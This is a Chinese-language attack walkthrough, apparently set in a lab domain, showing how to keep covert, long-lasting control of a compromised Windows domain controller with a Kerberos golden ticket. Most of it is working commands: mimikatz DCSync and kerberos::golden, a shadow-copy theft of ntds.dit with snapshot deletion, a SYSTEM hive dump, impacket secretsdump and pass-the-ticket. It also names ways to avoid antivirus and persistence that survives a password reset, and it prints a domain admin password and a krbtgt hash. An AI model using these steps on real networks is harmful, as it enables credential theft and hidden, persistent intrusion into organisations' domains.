0x00 前言

当控制了一台域控服务器的情况下，为了不打草惊蛇又为了长时间控制，可以考虑使用黄金票据进行权限维持。

目前以控制一台域内成员机器WIN2016，ip：10.0.10.111  无杀软

一台域控机器WIN2019，ip：10.0.10.110                           有杀软

域名：vulntarget.com

域管：vulntarget\administrator

域管密码：Admin@666

通过之前的攻击，我们拿到了域管理员的账号密码，并通过wmiexec成功从WIN2016连接并控制了WIN2019

 0x01 黄金票据制作前

前置条件

在使⽤⻩⾦票据（Golden Ticket）攻击时，需要以下信息：
需要伪造的域管理员⽤户名（⼀般是域管账户，这里我们就是administrator）
完整的域名
域 krbtgt SID（就是域成员krbtgt SID去掉最后的）
krbtgt 的 NTLM Hash 或 AES-256 值

krbtgt SID获取

将该vbs脚本上传到目标机器上

On Error Resume Next
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_UserAccount Where LocalAccount='False'")

For Each objItem in colItems
WScript.Echo objItem.Name & "," & objItem.SID
Next

 我们不要后面的502（RID），只要：S-1-5-21-3795598892-1521228294-2653055093

krbtgt NTLM哈希获取

如果目标机器可以使用mimikatz的话那很简单

mimikatz.exe "log" "privilege::debug" "lsadump::dcsync /domain:vulntarget.com /user:krbtgt" "exit"

这就是我们想要获得的，但是目标机器存在杀软，假设我们也没有免杀的mimikatz，那么如何获得krbtgt的NTLM哈希呢，我们可以通过vssadmin将整个ntds.dit弄下来然后解密所有域内机器和用户的哈希。

vssadmin 是 Windows Server 2008 及 Windows 7 提供的 VSS 管理工具，可用于创建和删除卷影拷贝、列出卷影的信息（只能管理系统 Provider 创建的卷影拷⻉）、显示已安装的所有卷影拷贝写⼊程序（writers）和提供程序（providers），以及改变卷影拷⻉的存储空间（即所谓的“diff空间”）的大小等。

第一步：创建⼀个 C 盘的卷影拷贝

vssadmin create shadow /for=c:

第二步：在创建的卷影拷贝中将 ntds.dit 复制出来：

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit c:\ntds.dit

 可以看到ntds.dit已经被复制出来

第三步：删除快照

vssadmin Delete Shadows /For=C: /Oldest

最后还需转储 system.hive，system.hive 中存放着ntds.dit的密钥，如果没有该密钥，将⽆法查看 ntds.dit 中的信息: 

reg save hklm\system system.hive

此时我们会发现这两个文件已经被我们弄到了域控机器的C盘上了，但是如何在不免杀上线cs等c2工具上将这两个文件下载到我们控制的WIN2016机器上呢，我们可以用impacket工具包中的wmiexec.py连接控制域控，而不要使用wmiexec.vbs 因为前者自带一个lget命令（最新版impacket）get命令（旧版impacket）

 这样就可以了，我们将这两个文件都下载下来，然后再使用impacket工具包中的secretdump.py脚本

python3 secretsdump.py -system system.hive -ntds ntds.dit LOCAL

这样我们也成功拿到了krbtgt的NTLM哈希，准确的说我们要的是:后面那段：a3dd8e4a352b346f110b587e1d1d1936

0x02 黄金票据制作

所有需要的东西都拿到了，那我们就可以在本地无杀软的环境中利用mimikatz制作黄金票据

kerberos::golden /user:administrator /domain:vulntarget.com /sid:S-1-5-21-3795598892-1521228294-2653055093 /krbtgt:a3dd8e4a352b346f110b587e1d1d1936 /ticket:Administrator.kiribi

成功生成Administrator.kirbi的黄金票据。 接下来在WIN2016的机器上利用mimikatz进行票据传递

未注入前WIN2016连接域控是拒绝访问的

 不用管理员权限运行mimikatz，通过ptt的方法将票据传递过去，就可以访问域控了

 之后我们的打法就变成了IPC连接后的打法了，上传下载文件，计划任务执行啥的都可以后续继续操作了，至于为啥一定要做个黄金票据权限维持呢，这样的好处就是如果域管账号密码更改了，我们也可以依然控制着域控，不会收到任何影响